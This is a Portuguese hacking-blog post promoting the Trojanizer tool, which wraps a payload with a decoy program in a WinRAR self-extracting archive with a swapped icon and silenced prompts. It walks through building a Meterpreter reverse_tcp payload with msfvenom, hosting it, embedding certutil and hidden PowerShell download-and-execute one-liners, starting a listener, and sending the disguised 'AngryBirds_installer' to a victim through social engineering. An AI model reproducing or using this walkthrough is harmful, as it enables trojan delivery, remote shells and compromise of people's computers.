Trojanizer - Trojanize sua carga útil (WinRAR [SFX] Automatização) - Anonymous Hacker

[Latest News][10]

Adobe
Análise de Vulnerabilidade
ANDROID
ANONYMOUS
Anti Vírus
ANTI-DDOS
ANTI-SPYWARES E ADWARES
Antivírus
APK PRO
APOSTILAS
apps
Ativador
CIÊNCIA
Compartilhadores
Computador pc
CURSO PHP
CURSO TCP / IP
CURSOS
Cursos Diversos
CYBORG
CYBORG FALÇÃO
DDOS
DEEPWEB
Desenvolvimento Web
DICAS
Diversos
DOCUMENTARIO
DoS
Editor de Áudio
Editor de Imagem
Editor de Texto
Editor de Vídeo
Engenharia
EXPLOIT
FACEBOOK
Ferramentas de rede
FORENSE DIGITAL
Fundamentos financeiros
Gravadores
Internet
INVASÕES
IPHONE
JOGOS
KALI LINUX
Limpeza e Utilitários
Lixão
MAC OS
macOS
Malware
Manutenção de Pcs
MySQL
NOTÍCIAS
PAGINA FAKE
PHP SCRIPT
Produtividade
Programa De Invasao
PROGRAMAÇÃO
PROGRAMAS
PROXY
SCRIPTS
SEGURANÇA
Seo
SHELL
SISTEMA OPERACIONAL
TÉCNICA DE INVASÃO
Termux
tools
Utilitários
VIDEOS
VPN
WHATSAPP
WINDOWS
Wireless Attacks
z=

Trojanizer - Trojanize sua carga útil (WinRAR [SFX] Automatização)


A ferramenta Trojanizer usa WinRAR (SFX) para comprimir os dois arquivos inseridos pelo usuário e transforma-lo em um arquivo SFX executável (.exe). O arquivo sfx quando executado executará ambos os arquivos (nossa carga útil e o aplicativo legit ao mesmo tempo).

Para tornar o arquivo menos suspeito segmentar no tempo de execução, o trojanizador tentará substituir o ícone padrão (.ico) do arquivo sfx por um selecionado pelo usuário e suprimir todas as msgs do arquivo sandbox do arquivo SFX (Silencioso = 1 | Substituir = 1 ).

Trojanizer não irá criar trojans, mas a partir da perspectiva do alvo, ele replica o comportamento trojan '
(execute a carga útil em segundo plano, enquanto a aplicação legível executa em primeiro plano)

DEPENDÊNCIAS (aplicativos backend)

Zenity (bash-GUIs) | Vinho (x86 | x64) | WinRAr.exe (instalado no vinho)
"Trojanizer.sh irá baixar / instalar todas as dependências como elas são necessárias"

É recomendável editar e configurar a opção: SYSTEM_ARCH = [your_sys_arch] no arquivo 'settings' antes de tentar executar a ferramenta pela primeira vez.


PAYLOADS (agentes) ACEITADOS

.exe | .bat | .vbs | .ps1
"Todas as cargas úteis que o Windows / SFX pode extrair automaticamente-executar"

DENTE: Se selado 'SINGLE_EXEC = ON' no arquivo de configurações, o trojanizador aceitará qualquer tipo de extensão a ser inputed. 

APLICAÇÕES LEGIT ACEITES (chamarizes)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc.
"Todos os aplicativos que o Windows / SFX pode executar automaticamente-execute"

CONFIGURAÇÕES AVANÇADAS


As "opções avançadas" do Trojanizer só são acessíveis no arquivo 'settings', e só podem ser configuradas antes de executar a ferramenta principal (Trojanizer.sh)



- Opção avançada pré-definida

O Trojanizer pode ser configurado para executar um comando + do programa antes da extração / execução dos dois arquivos compactados (arquivo SFX). Isso permite que os usuários aproveitem o software pré-instalado para executar um comando remoto antes que a extração real ocorra no sistema de destino. Se estiver ativo, o trojanizador pedirá (zenity sandbox) para que o comando seja executado 


- Single_file_execution
Vamos ver o cenário seguinte: você tem uma carga útil dll para entrada que você precisa executar após a extração, mas os arquivos sfx não podem executar arquivos dll diretamente. Esta configuração permite aos usuários inserir um script de lote (.bat) que será usado para executar a carga útil dll. Tudo o que o Trojanizer precisa fazer é instruir o arquivo SFX para extrair ambos os arquivos e executar o script.bat 


O comportamento padrão do switch single_file_execution é para comprimir os dois arquivos inputed pelo usuário, mas apenas executa um deles no tempo de extração (o arquivo de 2º inputed será executado) ...

TROJANIZADOR E BYPASSES WHITELISTING APPL

Um monte de trabalho maravilhoso foi feito por muitas pessoas, especialmente @subTee, em relação ao bypass de listagem de aplicativos, que é eventualmente o que desejamos aqui: execute código arbitrário que abuse dos binários internos da Microsoft. Windows oneliners para baixar carga remota e executar código arbitrário

O exercício a seguir descreve como usar o trojanizador 'single_file_execution' e 'Presetup' switches avançados para soltar (download remoto) e executar qualquer carga usando 'certutil' ou 'powershell' appl_whitelisting_bypass oneliners ...

1º - use metasploit para construir nossa carga útil

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copie payload.exe para apache2 webroot e comece o serviço
cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edite o arquivo 'configurações' do Trojanizer e ative:
PRE_SETUP=ON
SINGLE_EXEC=ON

4º - executando ferramenta trojanizer
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

- inicie um ouvinte e envie o arquivo sfx para o objetivo usando engenharia social

msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

Quando o arquivo sfx for executado, ele irá baixar o payload.exe do nosso servidor web apache2 para o destino e executá-lo antes de extrair 'screenshot.png' e 'AngryBirds.exe' (o último será executado para servir como chamariz) 

O follow oneliner usa 'método powershell (Downloadfile + start)' para alcançar o mesmo exercício anterior 'certutil'.

cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

O follow oneliner usa o método 'powershell (IEX + downloadstring)' para alcançar o mesmo (o loadload.ps1 não toca o disco)

cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DESCARREGAR / INSTALAR
1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots xsf.conf - execute ambos os arquivos após a extração (comportamento trojan)




xsf.conf - single_file_execution + Presetup (opções avançadas) 


xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil) 

xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX) 


Arquivo final do sfx com ícone alterado


Dentro do arquivo sfx (aberto com winrar) - comportamento trojan

Dentro do arquivo sfx (aberto com winrar) - single_file_execution


Tutoriais de vídeo 


Sobre

trabalho com segurança da informação a 13 anos, grande parte desse tempo como professor. Fiz meu bacharelado em ciência da computação, especialização em segurança da informação e logo após, mestrado em ciência da informação.

Nenhum comentário:

Postar um comentário

Start typing and press Enter to search